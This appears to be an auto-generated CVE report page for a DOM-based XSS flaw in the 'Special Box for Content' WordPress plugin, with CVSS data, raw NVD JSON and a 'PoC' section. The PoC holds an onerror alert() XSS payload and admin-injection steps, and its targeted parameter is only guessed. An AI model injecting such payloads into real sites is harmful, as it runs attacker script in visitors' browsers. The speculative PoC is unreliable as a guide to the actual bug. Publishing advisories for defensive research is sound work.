Security Vulnerability Report
CVE-2024-31119 CVSS 5.9 MEDIUM

CVE-2024-31119

Published: 2026-03-20 10:16:18
Last Modified: 2026-04-22 21:32:08

Description

Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Vasilis Triantafyllou Special Box for Content allows DOM-Based XSS. This issue affects Special Box for Content: from n/a through 1.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Special Box for Content <= 1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- PoC for CVE-2024-31119 (DOM-Based XSS)
     This payload demonstrates the execution of arbitrary JavaScript via a vulnerable parameter. -->
<script>
  // Step 1: Identify the vulnerable parameter (e.g., 'sb_content')
  // Step 2: Inject the payload into the URL or input field
  // Example Payload to be injected:
  // "><img src=x onerror=alert(1)>
  // If the plugin reflects this input into the DOM using innerHTML without sanitization:
  var vulnerableElement = document.querySelector('.special-box-content');
  // Simulating the vulnerable behavior:
  // vulnerableElement.innerHTML = unescapedUserInput;
  console.log("If vulnerable, an alert box with '1' should appear.");
</script>
<!-- Actual reproduction steps:
     1. Log in as a high-privileged user (Admin).
     2. Navigate to the Special Box settings.
     3. Inject the payload "><img src=x onerror=alert('CVE-2024-31119')> into a text field.
     4. Save the configuration.
     5. Visit a page where this box is rendered.
     6. Observe the JavaScript execution. -->
```

References

- https://patchstack.com/database/wordpress/plugin/special-box-for-content/vulnerability/wordpress-download-special-box-for-content-plugin-1-cross-site-scripting-xss-vulnerability?_s_id=cve
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2024-31119",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-20T10:16:17.790",
    "lastModified": "2026-04-22T21:32:08.360",
    "vulnStatus": "Deferred",
    "cveTags": [
      {"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}
    ],
    "descriptions": [
      {"lang": "en", "value": "Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Vasilis Triantafyllou Special Box for Content allows DOM-Based XSS.This issue affects Special Box for Content: from n/a through 1."},
      {"lang": "es", "value": "Vulnerabilidad de neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') en Vasilis Triantafyllou Special Box for Content permite XSS basado en DOM. Este problema afecta a Special Box for Content: desde n/d hasta 1."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L",
            "baseScore": 5.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 1.7,
          "impactScore": 3.7
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}
    ],
    "references": [
      {"url": "https://patchstack.com/database/wordpress/plugin/special-box-for-content/vulnerability/wordpress-download-special-box-for-content-plugin-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}
    ]
  }
}
```